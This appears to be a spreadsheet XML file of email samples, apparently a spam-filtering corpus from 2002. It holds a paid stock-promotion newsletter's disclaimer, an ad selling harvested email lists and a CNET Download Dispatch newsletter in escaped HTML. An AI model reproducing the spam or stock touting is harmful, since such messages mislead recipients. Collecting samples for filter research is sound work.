 - from &lt;em&gt;Telecommunications Magazin&lt;/em&gt;e - &lt;a href="http://www.telecomflash.com/default.asp?journalid=5&amp;func=articles&amp;page=070205&amp;year=2002&amp;month=7&amp;rsno=5"&gt;CLICK 
 HERE&lt;/a&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="left"&gt;Industry Interests - Telecommunications Websites: 
 &lt;a href="http://www.tiaonline.org/"&gt;TIA Online&lt;/a&gt; - &lt;a href="http://www.telecoms-mag.com/"&gt;Telecommunications 
 Magazine&lt;/a&gt; - &lt;a href="http://www.itworld.com/"&gt;IT World&lt;/a&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font size="3"&gt;&lt;b&gt;&lt;font color="#666666"&gt;The Wall 
 Street Bulletin is an independent newsletter and is not affiliated 
 with InDigiNet, Inc.&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font size="1"&gt;The Wall Street Bulletin is an independent 
 research firm. This report is based on The Wall Street Bulletin&amp;#8217;s 
 independent analysis but also relies on information supplied by 
 sources believed to be reliable. This report may not be the opinion 
 of IGTT management. The Wall Street Bulletin has also been retained 
 to research and issue reports on IGTT and was paid ten thousand 
 dollars by a shareholder of the company. The Wall Street Bulletin 
 may from time to time buy or sell IGTT common shares in the open 
 market without notice. The information contained in this report 
 is not intended to be, and shall not constitute, an offer to sell 
 or solicitation of any offer to buy any security. It is intended 
 for information only. Some statements may contain so-called &amp;#8220;forward-looking 
 statements&amp;#8221;. Many factors could cause actual results to 
 differ. Investors should consult with their Investment Advisor 
 concerning IGTT. Copyright 2002 &amp;copy; The Wall Street Bulletin 
 - All Rights Reserved&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font size="3"&gt;I no longer wish to receive your 
 newsletter &lt;a href="mailto:nomoreigtt2@444.net"&gt;&lt;b&gt;CLICK 
 HERE&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="right"&gt;&lt;font color="#000000" size="3"&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/div&gt;
 &lt;/div&gt;
 &lt;/div&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 tahnorrjilisgoyymddppqw
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Attn:Targeted email addresses
</t>
  </si>
  <si>
    <t xml:space="preserve">Targeted email marketing works!  There's no way around it.
 No other medium let's you share your offer with more 
 people for less than the cost of a small classified ad.
 We can supply valid targeted emails according 
 to your requirements, which are compiled only on your order, such as region/country/field/keyword/ 
 occupation/Domain Name (like AOL.com) etc.
 Free membership
 Signup today at http://61.151.247.41
 Limited membership
 This is a one time message, you will not be emailed again.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: This week: Rhapsody rules
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Download Dispatch - PC Edition&lt;/TITLE&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=windows-1252"&gt;
 &lt;META content="MSHTML 5.50.4522.1800" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY bgColor=#eeeeee&gt;
 &lt;CENTER&gt;
 &lt;!-- header --&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 bgColor=#ffffff border=0&gt;
    &lt;TBODY&gt;
    &lt;TR vAlign=top&gt;
      &lt;TD width=442 colSpan=4&gt;&lt;IMG height=60
        alt="Download Dispatch - PC Edition"
        src="http://www.cnet.com/i/nl/dl/hd_pc.gif" width=442&gt;&lt;BR&gt;
        &lt;TABLE cellSpacing=0 cellPadding=0 width=442 bgColor=#ffcc00 border=0&gt;
          &lt;TBODY&gt;
          &lt;TR&gt;
            &lt;TD bgColor=#000000 colSpan=3&gt;&lt;IMG height=1
              src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
          &lt;TR&gt;
            &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;&lt;IMG height=10
              src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
            &lt;TD width=10 rowSpan=2&gt;&lt;IMG height=10
              src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
            &lt;TD width=430&gt;&lt;IMG height=10 src="http://www.cnet.com/b.gif"
            width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
          &lt;TR&gt;
            &lt;TD bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif"
              width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;
        &lt;/TABLE&gt;
       &lt;/TD&gt;
 &lt;!-- Accucast ad --&gt;
 &lt;td width=160 rowspan=2&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- /Accucast ad --&gt;
 &lt;!-- search form --&gt;
 &lt;br&gt;&lt;table cellspacing=0 cellpadding=0 width=160 border=0&gt;&lt;form
 method=get action="http://www.search.com/redirect"&gt;
 &lt;tr valign=top&gt;&lt;td&gt;&lt;font size="-1" face="arial,helvetica,sans-serif"&gt;
 &lt;img src="http://www.cnet.com/i/nl/dl/dispatch_hd.gif" height=20
 width=150 alt="Search Download.com" border=0&gt;&lt;br&gt;
 &lt;img src="http://cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;&lt;input
 type=text name=q size=17 value=""&gt;&lt;br&gt;
 &lt;select name=target class=frmel&gt;
   &lt;option
 value="http://download.cnet.com/downloads/0,10150,0-10000-103-0-1-7,00.html?tag=srch&amp;qt=%%q%%&amp;cn=&amp;ca=10000"&gt;Downloads
   &lt;option
 value="http://cnet.search.com/search?tag=ex.downloadpc.dispatch.srch.cnet"&gt;All
 CNET
   &lt;option
 value="http://www.search.com/search?tag=ex.downloadpc.dispatch.srch.web"&gt;The
 Web
 &lt;/select&gt; &lt;input type=submit value="Go!"&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- /search form --&gt;
 &lt;!-- right column content --&gt;
 &lt;!-- updates &amp; drivers --&gt;
 &lt;IMG height=20 alt="Updates &amp; Drivers"
        src="http://www.cnet.com/i/nl/dl/rhc_up.gif" width=150&gt;&lt;BR&gt;
        &lt;TABLE cellSpacing=0 cellPadding=2 width=160 border=0&gt;
          &lt;TBODY&gt;
 &lt;TR&gt;&lt;TD&gt;
 &lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;FONT size=-2&gt;In Utilities:&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=da-dT8jQUPq2iK59d5bjsMVKpv3DxnR" &gt;CloneCD 4.0&lt;/A&gt;&lt;/B&gt;&lt;P&gt;
 &lt;FONT size=-2&gt;In Audio:&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkH9uW_1HIqBxDVAmoBameR" &gt;Sound Forge 6.0a build 150&lt;/A&gt;&lt;/B&gt;&lt;p&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXAWVZUsS98BbBL7kOi_yR" &gt;Media Jukebox 8.0.32&lt;/A&gt;&lt;/B&gt;&lt;p&gt;
 &lt;FONT size=-2&gt;In Internet:&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=19-BLe0I2rXwP8MMLFKMZ2Fz8IR7XlR" &gt;Accelerate 2K2 3&lt;/A&gt;&lt;/B&gt;&lt;P&gt;
 &lt;FONT size=-2&gt;In Multimedia:&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiK89wqCWxQktQ3DlPfP8N4R" &gt;FotoTime FotoAlbum 3.0.2&lt;/A&gt;&lt;/B&gt;&lt;P&gt;
 &lt;FONT size=-2&gt;In Web Authoring:&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJAW1Ag_rS9Z5VKc-3P0BcR" &gt;J-Perk 6.04&lt;/A&gt;&lt;/B&gt;&lt;P&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJHOQ9u9CjYjKHbtbXYzHRR" &gt;TextSOAP 1.5.2&lt;/A&gt;&lt;/B&gt;&lt;P&gt;
 &lt;FONT size=-2&gt;In Business &amp; Finance:&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=6d-e8plIDEI0tAv1po7Bc1bJBykEmZR" &gt;FileMaker Pro 6.0v2&lt;/A&gt;&lt;/B&gt;&lt;P&gt;
 &lt;FONT size=-2&gt;In Games:&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=82-P0EYQXK14auJLUi6gJLkjCXMZHnR" &gt;Balls of Steel Patch 1.3&lt;/A&gt;&lt;/B&gt;&lt;P&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;!-- /updates &amp; drivers --&gt;
 &lt;!-- catchup --&gt;
 &lt;!-- /catchup --&gt;
 &lt;!-- shopper upgrades --&gt;&lt;IMG height=20
        alt="Software &amp;#13;&amp;#10;Upgrades"
        src="http://a.r.tv.com/cnet.1d/i/nl/cu/rhc_shopper.gif" width=160
        NOSEND="1"&gt;&lt;BR&gt;
        &lt;TABLE cellSpacing=0 cellPadding=2 width=150 border=0&gt;
          &lt;TBODY&gt;
          &lt;TR&gt;
            &lt;TD&gt;
              &lt;P&gt;
              &lt;TABLE cellSpacing=0 cellPadding=2 width=150 border=0&gt;
                &lt;TBODY&gt;
                &lt;TR&gt;
                  &lt;TD colSpan=2&gt;&lt;FONT
                    face="Arial, Helvetica, &amp;#13;&amp;#10;sans-serif"
                    size=2&gt;&lt;B&gt;Most Popular Upgrades:&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;
                &lt;TR vAlign=top&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;&lt;B&gt;&amp;nbsp;1.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_za61WKq9lCW5CH7esbKRiR" &gt;
 ZoneAlarm Pro 3.0&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
                &lt;TR vAlign=top&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;&lt;B&gt;&amp;nbsp;2.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEBSOiMNH4QhaIHsSzky0PR" &gt;
 Norton AntiVirus 2002&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
                &lt;TR vAlign=top&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;&lt;B&gt;&amp;nbsp;3.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEkRhXZoi4gVnxXFZcIuInR" &gt;
 AdSubtract Pro 2.5&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
                &lt;TR vAlign=top&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;&lt;B&gt;&amp;nbsp;4.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d7-wk3ZQLWkDhzIDz9RmBekeVktk2eR" &gt;
 Microsoft Windows XP - Professional&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR vAlign=top&gt;
 		                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;&lt;B&gt;&amp;nbsp;5.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy2FgXSurk1kOqFb2GVaGyR" &gt;
 Nero Burning ROM 5.5&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
                &lt;TR vAlign=top&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;&lt;B&gt;&amp;nbsp;6.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
                  &lt;a href="http://clickthru.online.com/Click?q=01-9oXDI2jHs5wF8rMvurMPGPxZ6RlR" &gt;
 Reason 2.0&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
                    &lt;TR vAlign=top&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 	                       size=-1&gt;&lt;B&gt;&amp;nbsp;7.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 	                     &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 	                     &lt;a href="http://clickthru.online.com/Click?q=16-T_cjI4cFDOiDiQADblRuaBDxRU4R" &gt;
 Microsoft Windows XP - Home Edition&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR vAlign=top&gt;
 		                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 		                    size=-1&gt;&lt;B&gt;&amp;nbsp;8.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 		                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		                  &lt;a href="http://clickthru.online.com/Click?q=2c-DatOIc0DRUHS1KHc-r7MBvWpjuyR" &gt;
 QuickBooks Pro 2002&lt;/A&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
                &lt;TR vAlign=top&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;&lt;B&gt;&amp;nbsp;9.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKIeDqXE8fU5CfCkxHB0FFR" &gt;
 Adobe Photoshop 7.0&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
                &lt;TR vAlign=top&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&lt;B&gt;10.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=56-NwKYInnsvJVSpcErctPQDwwaMC9R" &gt;
 WinZip 8.1&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
                &lt;TR&gt;
                  &lt;TD colSpan=2&gt;
                    &lt;FONT face="Arial, Helvetica, sans-serif" size=-2&gt;&lt;BR&gt;Find a
                    complete list of the 50 most popular software products at
                    &lt;a href="http://clickthru.online.com/Click?q=6b-8g5ZIHEcOAe5gIK80ywQ-4d0P6cR" &gt;&lt;B&gt;CNET
 Shopper.com&lt;/B&gt;&lt;/A&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
              &lt;P&gt;&lt;!-- /shopper upgrades --&gt;
 &lt;!-- Vertical Brick: July 1 2002--&gt;
  &lt;IMG alt="Also from CNET" height=20 src="http://home.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 NOSEND="1"&gt;&lt;BR&gt; &lt;TABLE border=0 cellPadding=2 cellSpacing=0 width=150&gt;&lt;TBODY&gt;&lt;TR vAlign=top&gt; &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0KYevlFaIoaDkjVsTLZ8iR" &gt;Summer 2002 software&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdJfeUG9lor1yZeU_u_KnPR" &gt;Test your bandwidth&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUr_tWDl8FWLXZBXqONOVnR" &gt;New jobs, click here!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8Zrg9kL4G45w8PF_jEuwteR" &gt;Inside HP&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d4-E0SqQ0ExoPjrJ0W_4Mc3148lk6yR" &gt;Bluetooth: speeds up&lt;/a&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Vertical Brick--&gt;
 &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;&lt;/TD&gt;
 &lt;!-- /right column content --&gt;
 &lt;!-- Main body content --&gt;
      &lt;TD width=9 rowSpan=2&gt;&lt;IMG height=60
        src="http://www.cnet.com/i/nl/dd_c.gif" width=9&gt;&lt;BR&gt;
        &lt;TABLE cellSpacing=0 cellPadding=0 width=9 border=0&gt;
          &lt;TBODY&gt;
          &lt;TR&gt;
            &lt;TD bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif"
              width=9&gt;&lt;/TD&gt;&lt;/TR&gt;
          &lt;TR&gt;
            &lt;TD bgColor=#ffcc00&gt;&lt;IMG height=10 src="http://www.cnet.com/b.gif"
              width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
          &lt;TR&gt;
            &lt;TD bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif"
              width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
      &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;
        &lt;TABLE cellSpacing=0 cellPadding=0 width=1 border=0&gt;
          &lt;TBODY&gt;
          &lt;TR&gt;
            &lt;TD bgColor=#eeeeee&gt;&lt;IMG height=60 src="http://www.cnet.com/b.gif"
              width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
    &lt;TR vAlign=top&gt;
      &lt;TD width=1 bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif"
        width=1&gt;&lt;/TD&gt;
      &lt;TD width=10 bgColor=#ffcc00&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif"
        width=10&gt;&lt;/TD&gt;
      &lt;TD width=1 bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif"
        width=1&gt;&lt;/TD&gt;
        &lt;!-- ?? --&gt;
      &lt;TD width=430 bgColor=#ffffff&gt;
        &lt;TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#ffffef border=0&gt;
          &lt;TBODY&gt;
          &lt;TR vAlign=top&gt;
            &lt;TD width=10 rowSpan=2&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif"
              width=10&gt;&lt;/TD&gt;
            &lt;TD colSpan=2&gt;
     &lt;!-- Date --&gt;
     &lt;font face="arial, helvetica" size="-2"&gt;&lt;b&gt;July 9, 2002&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
     &lt;!-- /Date --&gt;
      &lt;IMG height=8 src="http://www.cnet.com/b.gif"
              width=1&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;
          &lt;TR vAlign=top&gt;
            &lt;TD align=left width=410&gt;&lt;IMG height=86
              src="http://download.com.com/i/dl/scr/66x86kellyg.gif"
              width=66 border=0 align=left hspace=15 vspace=5&gt;&lt;!--BR&gt;&lt;/TD&gt;
            &lt;TD width=315--&gt;
 &lt;!-- title --&gt;
 &lt;p&gt;
 &lt;font face="arial, helvetica" size=-1&gt;&lt;FONT color=#333333
 size=3&gt;&lt;b&gt;Rhapsody rules&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;!-- /title --&gt;
 &lt;!-- letter --&gt;
 &lt;FONT face="arial, helvetica" size=-1&gt;
 I never thought I&amp;#146;d say it, but I&amp;#146;m changing my tune about subscription music services.&lt;p&gt;
 When MusicNet and Pressplay launched their monthly subscription services late last year, I was unimpressed. Their music catalogs were limited, the software was clunky, and the copyright protection features seemed unduly restrictive. I wondered how they could ever compete with the seductive (read: free) charms of file sharing. But last week I decided to try out Listen.com&amp;#146;s &lt;a href="http://clickthru.online.com/Click?q=ea-fjLyQhV4XV2SrBzAwQ4lAUw-5WnR" &gt;Rhapsody&lt;/a&gt;, a subscription streaming music service that recently managed to secure recordings from all five major labels. And now I&amp;#146;m rethinking my stance.&lt;p&gt;
 Rhapsody is not for everyone. If you like to burn your MP3s to CD or download them to a portable player, you&amp;#146;ll want to look elsewhere; Rhapsody allows CD burning only for a small portion of its catalog, and only for an extra charge, and you can&amp;#146;t download MP3s at all. But what Rhapsody does have is music, and lots of it--thousands of albums of all major genres on demand as well as tons of preprogrammed radio stations. I think Listen.com might be onto something with its streaming service. Would you pay 10 bucks a month for a service that has all the music you could ask for, but won't allow you to actually download MP3s? Let me know at &lt;a href="mailto:edit@download.com?subject=rhapsody%20rules"&gt;edit@download.com&lt;/a&gt;&lt;p&gt;
 &lt;p&gt;Kelly Green&lt;br&gt;
 Director, CNET Download.com&lt;p&gt;
 &lt;!-- /letter --&gt;
            &lt;TD width=10&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif"
            width=10&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
            &lt;!-- was 430--&gt;
        &lt;TABLE cellSpacing=0 cellPadding=0 width=100% border=0&gt;
          &lt;TBODY&gt;
          &lt;TR&gt;
            &lt;TD bgColor=#ffcc00&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif"
              width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
        &lt;TABLE cellSpacing=0 cellPadding=10 width=100% border=0&gt;
          &lt;TBODY&gt;
          &lt;TR&gt;
            &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;!-- FEATURES &amp; REVIEWS --&gt;
   &lt;TABLE border=0 cellPadding= cellSpacing=0 width=100%&gt;
          &lt;TBODY&gt;
          &lt;TR&gt;
            &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;IMG
              alt="Reviews &amp;amp; Features"
              src="http://www.cnet.com/i/nl/lx/sub_rev.gif"
              border=0&gt;&lt;BR&gt;&lt;IMG height=8
              src="http://www.cnet.com/i/nl/rule.gif" width=410
              border=0&gt;&lt;BR&gt;
              &lt;TABLE align=left border=0 cellPadding=0 cellSpacing=0 width=95&gt;
                &lt;TBODY&gt;
                &lt;TR&gt;
                  &lt;TD&gt;&lt;a href="http://clickthru.online.com/Click?q=ff-sVoVQms4myisiMnZxrhBm0WHtheR" &gt;&lt;IMG
                    border=0 src="http://download.com.com/i/dl/scr/powerdownloader_promo21.gif"&gt;
                &lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;FONT
 face=arial,helvetica size=-1&gt;&lt;A
              name=h1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=14-5MRAIF-zGNmryZd8ZvQIzTKtR1yR" &gt;
 Power Downloader fixes his computer
 &lt;/A&gt;&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;Sometimes even a superhero has to handle mundane computer
    maintenance. Power Downloader's Weekly Picks returns with
    four apps that will save your PC from itself.
 &lt;FONT face=arial,helvetica size=-1&gt;&lt;A
              name=h1&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=29-Sg_rIjMAh2JKeqdNyGEI9rCM8vlR" &gt;
 Protect your PC
 &lt;/A&gt;&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;It almost seems like there's a new virus in the news every
    week. Of course, you want to protect your PC. But
    how? CNET Software editors walk you through 10 antivirus options.
 &lt;/font&gt;
              &lt;br&gt;&lt;br&gt;&lt;/TABLE&gt;
              &lt;!-- /FEATURES &amp; REVIEWS --&gt;
 &lt;!-- DOWNLOAD LAUNCHPAD --&gt;
 &lt;A name=h1&gt;&lt;IMG height=19 alt="CNET's Exclusive Downloads"
 src="http://www.cnet.com/i/nl/dl/HEAD_dwnld_launch.gif"
 width=175&gt;&lt;/A&gt;&lt;BR&gt;
 &lt;IMG height=8 src="http://www.cnet.com/i/nl/rule.gif" width=410&gt;&lt;BR&gt;
 &lt;!-- &lt;font face="arial,helvetica" size=+0
 color=#666666&gt;&lt;b&gt;&lt;i&gt;Download Launchpad&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;table width=410 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td bgcolor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/i/b.gif" width=410&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt; --&gt;
 &lt;font face="verdana,geneva,helvetica" size=-2&gt;New products from our
 sponsors&lt;br&gt;&lt;/font&gt;
 &lt;IMG height=8 src="http://www.cnet.com/i/b.gif" width=1&gt;&lt;br&gt;
 &lt;B&gt; &lt;a href="http://clickthru.online.com/Click?q=3f-4sAEIqMWSIVspnSHcoh57BymNzeR" &gt;New Window Washer 4.7&lt;/A&gt;&lt;/B&gt;
 &lt;BR&gt;What you do online is nobody's business. Take control with
    Window Washer. Protect your privacy, clean unwanted files, and
    boost PC performance. Download a free trial version today.&lt;br&gt;&lt;br&gt;
 &lt;B&gt; &lt;a href="http://clickthru.online.com/Click?q=54-l6ovIZKA72QW4AZ0O9U4lR0vdksR" &gt;Magic: The Gathering Online
 &lt;/A&gt;&lt;/B&gt;&lt;BR&gt;Have the deadliest strategies all at your control. Experience the most
    competition. There's always a game on.
    As your game grows, new challenges await.&lt;br&gt;&lt;br&gt;
 &lt;font face="verdana,geneva,helvetica" size=-2&gt;All Download Launchpad
 titles powered by Download Express--CNET's new speedy download
 service!&lt;/font&gt;&lt;br&gt;
 &lt;!-- /DOWNLOAD LAUNCHPAD --&gt;
 &lt;!-- top ten --&gt;
 &lt;BR&gt;
 &lt;A name=h2&gt;&lt;IMG height=19 alt="This Week's Top Ten Downloads"
 src="http://www.cnet.com/i/nl/dl/sub_top10.gif"
 width=250&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG height=8
 src="http://www.cnet.com/i/nl/rule.gif" width=410&gt;&lt;br&gt;
 &lt;!-- Top 10 intro --&gt;
 KaZaA remains at the top, our very own CNET CatchUp moves up
    a couple spots to No. 8, and Download Accelerator drops 2
    spots to round out the list at No. 10
 &lt;!-- /Top 10 intro --&gt;
 &lt;TABLE cellSpacing=0 cellPadding=4 width="100%"
 border=0&gt;&lt;TBODY&gt;&lt;TR&gt;&lt;TD width="6%" height=36&gt;&lt;FONT face="arial,
 helvetica" size=-1&gt; &lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="39%"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;B&gt;Most Popular Titles&lt;/B&gt;&lt;BR&gt;
 &lt;!-- Week Ending Date --&gt;
          &lt;FONT size=-2&gt;Week ending July 14&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;!-- /Week Ending Date --&gt;
                  &lt;TD width="13%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;  &lt;B&gt;Last&lt;BR&gt;  Week&lt;/B&gt; &lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD width="16%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;  &lt;B&gt;Weeks&lt;BR&gt;  on Chart&lt;/B&gt; &lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD width="26%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;  &lt;B&gt;Downloads&lt;BR&gt;  This
